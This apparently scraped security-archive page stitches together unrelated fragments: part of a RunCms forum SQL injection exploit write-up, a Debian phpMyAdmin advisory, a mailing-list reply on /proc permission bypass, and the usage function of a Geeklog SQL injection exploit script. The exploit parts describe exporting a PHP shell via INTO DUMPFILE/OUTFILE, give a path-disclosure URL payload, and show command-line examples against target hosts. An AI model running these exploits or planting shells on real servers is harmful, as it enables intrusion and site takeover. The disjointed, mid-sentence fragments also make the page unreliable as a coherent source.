
RunCms v.2M1 /modules/forum/post.php - 'forum' remote semi-blind SQL Injection Exploit

    - an existing row in [prefix]_forum_forum_access table
     
    which is very possible against a runcms installation with a working and active forum.
     
    Also, you could manipulate the query in post.php to export a php shell through
    'INTO DUMPFILE' method, but you need FILE privilege and magic_quotes_gpc = off.
     
    It's also possible to disclose absolute path in certain conditions (see error_reporting)
    by polluting a preg_match() argument:
     
    http://[host]/[path_to_runcms]/modules/contact/index.php?op[]=1

[SECURITY] [DSA 2034-1] New phpmyadmin packages fix several vulnerabilities

project identifies the following problems:

CVE-2008-7251

    phpMyAdmin may create a temporary directory, if the configured directory
    does not exist yet, with insecure filesystem permissions.

CVE-2008-7252

    phpMyAdmin uses predictable filenames for temporary files, which may
    lead to a local denial of service attack or privilege escalation.

Re: /proc filesystem allows bypassing directory permissions on Linux

resources, a check should be done to see what it allows. The check for the
inode permissions is more questionable. As can be seen above, using a fd
directly ignores file permissions and only uses fd "permissions". Accessing
via /proc is like accessing via fd, so there is an argument to be had for
keeping semantics the same (then again, there's an argument to be had
for listening to file system permissions since that's also the context it's
in).

The directory permissions are irrelevant in the case of access via fd
without the use of /proc. The directory permissions only control 3 things:


Geeklog <=1.5.2 SEC_authenticate()/PHP_AUTH_USER sql injection exploit

        }
    }

    function syntax() {
        // $argv is only defined in global scope; without this the usage text
        // would print an empty script name
        global $argv;
        print (
        "Syntax: php ".$argv[0]." [host] [path] [OPTIONS]\n".
        "Options:\n".
        "--port:[port]         - specify a port\n".
        "                        default->80\n".
        "--prefix              - try to extract table prefix from information.schema\n".
        "                        default->gl_\n".
        "--uid:[n]             - specify an uid other than default (2,usually admin)\n".
        "--proxy:[host:port]   - use proxy\n".
        "--skiptest            - skip preliminary tests\n".
        "--test                - run only tests\n".
        "--export_shell:[path] - try to export a shell with INTO OUTFILE, needs Mysql\n".
        "                        FILE privilege\n".
        "--sp                  - submit a 'staticpage' with php code, needs geeklog\n".
        "                        sp_php permission set to true for the staticpage\n".
        "                        plugin (not the default)\n".
        "Examples:   php ".$argv[0]." 192.168.0.1 /geeklog/\n".
        "            php ".$argv[0]." 192.168.0.1 /  --prefix --proxy:1.1.1.1:8080\n".
        "            php ".$argv[0]." 192.168.0.1 /  --prefix --export_shell:/var/www\n".
        "            php ".$argv[0]." 192.168.0.1 /  --prefix --uid:3");
        die();
    }

    error_reporting(E_ALL ^ E_NOTICE);



Copyright © 1995-2012 LinuxRocket.net. All rights reserved.